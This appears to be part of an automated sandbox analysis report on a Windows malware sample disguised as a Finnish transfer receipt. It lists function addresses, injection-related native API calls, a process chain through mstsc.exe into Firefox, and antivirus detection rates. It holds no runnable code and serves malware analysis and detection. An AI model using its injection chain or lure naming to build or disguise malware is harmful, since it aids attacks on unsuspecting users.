      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033224CF1_2_033224CF
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091BD8301_2_091BD830
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091DA3001_2_091DA300
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091D8B701_2_091D8B70
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091DA36B1_2_091DA36B
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091BDA501_2_091BDA50
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091BBAD01_2_091BBAD0
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091DB2E61_2_091DB2E6
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091D9C371_2_091D9C37
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091C44501_2_091C4450
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091C444E1_2_091C444E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01661D723_2_01661D72
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016625363_2_01662536
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01662D0F3_2_01662D0F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166110C3_2_0166110C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166151E3_2_0166151E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166191E3_2_0166191E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01660DE53_2_01660DE5
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01661DEE3_2_01661DEE
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016615E83_2_016615E8
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016611FC3_2_016611FC
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016625FC3_2_016625FC
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016619D43_2_016619D4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016621A93_2_016621A9
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166118F3_2_0166118F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01660D8F3_2_01660D8F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016625973_2_01662597
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016619943_2_01661994
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016615983_2_01661598
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166286E3_2_0166286E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628763_2_01662876
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628743_2_01662874
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166287E3_2_0166287E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166287C3_2_0166287C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166287A3_2_0166287A
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628783_2_01662878
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01660C453_2_01660C45
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016620433_2_01662043
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01661C4C3_2_01661C4C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01662C4C3_2_01662C4C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166245F3_2_0166245F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016610313_2_01661031
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016614393_2_01661439
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016620F73_2_016620F7
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01661CC43_2_01661CC4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016624CF3_2_016624CF
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628C83_2_016628C8
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01662CA13_2_01662CA1
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628BE3_2_016628BE
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628BB3_2_016628BB
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628863_2_01662886
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628843_2_01662884
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628823_2_01662882
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628803_2_01662880
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166288E3_2_0166288E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166288C3_2_0166288C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166108D3_2_0166108D
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166288A3_2_0166288A
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628883_2_01662888
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628963_2_01662896
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628923_2_01662892
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628903_2_01662890
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016628983_2_01662898
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016614993_2_01661499
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016618993_2_01661899
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016613603_2_01661360
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166277C3_2_0166277C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01660F533_2_01660F53
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01662B273_2_01662B27
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166272F3_2_0166272F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166172C3_2_0166172C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01661F293_2_01661F29
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01660F183_2_01660F18
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016613E43_2_016613E4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01662BEA3_2_01662BEA
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016627F73_2_016627F7
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01660FD53_2_01660FD5
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01660BDF3_2_01660BDF
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01661FD93_2_01661FD9
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01661F893_2_01661F89
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01662B9E3_2_01662B9E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01660E603_2_01660E60
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166126C3_2_0166126C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016616733_2_01661673
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166267F3_2_0166267F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01661E5C3_2_01661E5C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01661A583_2_01661A58
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166222D3_2_0166222D
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016612E53_2_016612E5
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016626F43_2_016626F4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01661ECF3_2_01661ECF
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016616D03_2_016616D0
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01662AB83_2_01662AB8
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01662A9F3_2_01662A9F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046504455_2_04650445
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BD4805_2_046BD480
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0471A5265_2_0471A526
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047075C65_2_047075C6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470F5C95_2_0470F5C9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046746705_2_04674670
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FD6465_2_046FD646
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046ED62C5_2_046ED62C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466C6005_2_0466C600
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C36EC5_2_046C36EC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464C6E05_2_0464C6E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470F6F65_2_0470F6F6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470A6C05_2_0470A6C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046506805_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046527605_2_04652760
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465A7605_2_0465A760
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047067575_2_04706757
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FE0765_2_046FE076
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047070F15_2_047070F1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465B0D05_2_0465B0D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046400A05_2_046400A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0468508C5_2_0468508C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0469717A5_2_0469717A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046ED1305_2_046ED130
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F1135_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0471010E5_2_0471010E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466B1E05_2_0466B1E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046551C05_2_046551C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046122455_2_04612245
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470124C5_2_0470124C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463D2EC5_2_0463D2EC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470F3305_2_0470F330
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465E3105_2_0465E310
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046413805_2_04641380
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04653C605_2_04653C60
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470EC605_2_0470EC60
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04706C695_2_04706C69
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FEC4C5_2_046FEC4C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465AC205_2_0465AC20
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04640C125_2_04640C12
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D7CE85_2_046D7CE8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466FCE05_2_0466FCE0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0471ACEB5_2_0471ACEB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04668CDF5_2_04668CDF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046E9C985_2_046E9C98
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650D695_2_04650D69
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04707D4C5_2_04707D4C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470FD275_2_0470FD27
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464AD005_2_0464AD00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EFDF45_2_046EFDF4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04659DD05_2_04659DD0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04662DB05_2_04662DB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046F0E6D5_2_046F0E6D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04692E485_2_04692E48
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04670E505_2_04670E50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04642EE85_2_04642EE8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04709ED25_2_04709ED2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04651EB25_2_04651EB2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04700EAD5_2_04700EAD
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470FF635_2_0470FF63
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465CF005_2_0465CF00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04656FE05_2_04656FE0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04701FC65_2_04701FC6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470EFBF5_2_0470EFBF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470F8725_2_0470F872
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046368685_2_04636868
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046598705_2_04659870
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466B8705_2_0466B870
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C58705_2_046C5870
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046F08355_2_046F0835
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046538005_2_04653800
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467E8105_2_0467E810
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047078F35_2_047078F3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046528C05_2_046528C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047018DA5_2_047018DA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C98B25_2_046C98B2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046668825_2_04666882
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046199E85_2_046199E8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046959C05_2_046959C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464E9A05_2_0464E9A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470E9A65_2_0470E9A6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470EA5B5_2_0470EA5B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470CA135_2_0470CA13
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466FAA05_2_0466FAA0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470FA895_2_0470FA89
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470FB2E5_2_0470FB2E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0468DB195_2_0468DB19
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650B105_2_04650B10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C4BC05_2_046C4BC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_00338E505_2_00338E50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_003512E65_2_003512E6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_003503005_2_00350300
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0035036B5_2_0035036B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0033A4505_2_0033A450
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0033A44E5_2_0033A44E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_003338305_2_00333830
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_00333A505_2_00333A50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_00331AD05_2_00331AD0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0034EB705_2_0034EB70
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0034FC375_2_0034FC37
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 046CEF10 appears 105 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04697BE4 appears 91 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04685050 appears 36 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0463B910 appears 268 times
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 046BE692 appears 86 times
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091D6B30 NtReadFile,1_2_091D6B30
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091D6A80 NtCreateFile,1_2_091D6A80
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091D6C20 NtReadVirtualMemory,1_2_091D6C20
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091D6A7A NtCreateFile,1_2_091D6A7A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046834E0 NtCreateMutant,LdrInitializeThunk,5_2_046834E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682C30 NtMapViewOfSection,LdrInitializeThunk,5_2_04682C30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682CF0 NtDelayExecution,LdrInitializeThunk,5_2_04682CF0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_04682D10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04682DC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682E50 NtCreateSection,LdrInitializeThunk,5_2_04682E50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682F00 NtCreateFile,LdrInitializeThunk,5_2_04682F00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046829F0 NtReadFile,LdrInitializeThunk,5_2_046829F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682A10 NtWriteFile,LdrInitializeThunk,5_2_04682A10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04682AC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682A80 NtClose,LdrInitializeThunk,5_2_04682A80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682B00 NtQueryValueKey,LdrInitializeThunk,5_2_04682B00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04682B10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_04682BC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682B80 NtCreateKey,LdrInitializeThunk,5_2_04682B80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04682B90
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04684570 NtSuspendThread,5_2_04684570
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04684260 NtSetContextThread,5_2_04684260
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682C50 NtUnmapViewOfSection,5_2_04682C50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682C20 NtSetInformationFile,5_2_04682C20
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04683C30 NtOpenProcessToken,5_2_04683C30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682C10 NtOpenProcess,5_2_04682C10
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682CD0 NtEnumerateKey,5_2_04682CD0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04683C90 NtOpenThread,5_2_04683C90
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682D50 NtWriteVirtualMemory,5_2_04682D50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682DA0 NtReadVirtualMemory,5_2_04682DA0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682E00 NtQueueApcThread,5_2_04682E00
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682EC0 NtQuerySection,5_2_04682EC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682ED0 NtResumeThread,5_2_04682ED0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682EB0 NtProtectVirtualMemory,5_2_04682EB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682E80 NtCreateProcessEx,5_2_04682E80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682F30 NtOpenDirectoryObject,5_2_04682F30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682FB0 NtSetValueKey,5_2_04682FB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046838D0 NtGetContextThread,5_2_046838D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046829D0 NtWaitForSingleObject,5_2_046829D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682AA0 NtQueryInformationFile,5_2_04682AA0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682B20 NtQueryInformationProcess,5_2_04682B20
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682BE0 NtQueryVirtualMemory,5_2_04682BE0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0034CA80 NtCreateFile,5_2_0034CA80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0034CB30 NtReadFile,5_2_0034CB30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0034CBB0 NtClose,5_2_0034CBB0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0034CB80 NtDeleteFile,5_2_0034CB80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0034CC60 NtAllocateVirtualMemory,5_2_0034CC60
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0034CA7A NtCreateFile,5_2_0034CA7A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0034CB7C NtDeleteFile,5_2_0034CB7C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0034CBAA NtDeleteFile,5_2_0034CBAA
      Source: Siirtokuitti_006703.exe, 00000001.00000003.19304004948.0000000009272000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs Siirtokuitti_006703.exe
      Source: Siirtokuitti_006703.exe, 00000001.00000003.19306032866.00000000094DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs Siirtokuitti_006703.exe
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19325433829.00000000374AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs Siirtokuitti_006703.exe
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19283597652.000000003755E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Siirtokuitti_006703.exe
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: edgegdi.dllJump to behavior
      Source: Siirtokuitti_006703.exeReversingLabs: Detection: 37%
      Source: Siirtokuitti_006703.exeVirustotal: Detection: 49%
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile read: C:\Users\user\Desktop\Siirtokuitti_006703.exeJump to behavior
      Source: Siirtokuitti_006703.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Siirtokuitti_006703.exe C:\Users\user\Desktop\Siirtokuitti_006703.exe
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeProcess created: C:\Users\user\Desktop\Siirtokuitti_006703.exe C:\Users\user\Desktop\Siirtokuitti_006703.exe
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8968 -s 120
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeProcess created: C:\Users\user\Desktop\Siirtokuitti_006703.exe C:\Users\user\Desktop\Siirtokuitti_006703.exeJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
